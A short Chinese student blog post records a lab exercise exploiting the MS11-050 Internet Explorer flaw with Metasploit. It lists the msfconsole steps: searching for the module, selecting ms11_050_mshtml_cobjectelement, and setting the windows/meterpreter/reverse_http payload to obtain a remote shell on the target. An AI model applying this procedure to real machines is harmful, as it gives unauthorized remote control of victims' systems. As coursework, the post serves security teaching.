20145322 Exp5 MS11_050

20145322 Exp5 MS11_050

实验过程

msfconsole命令进入控制台

使用命令search ms11_050查看针对MS11_050漏洞的攻击模块

使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement 进入模块,并使用info查看该模块的具体信息

设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。

使用命令set payloads windows/meterpreter/reverse_http

使用show options 查看具体参数设置

设置其相关参数,攻击

成功

posted @   20145322何志威  阅读(173)  评论(0编辑  收藏  举报
努力加载评论中...
点击右上角即可分享
微信分享提示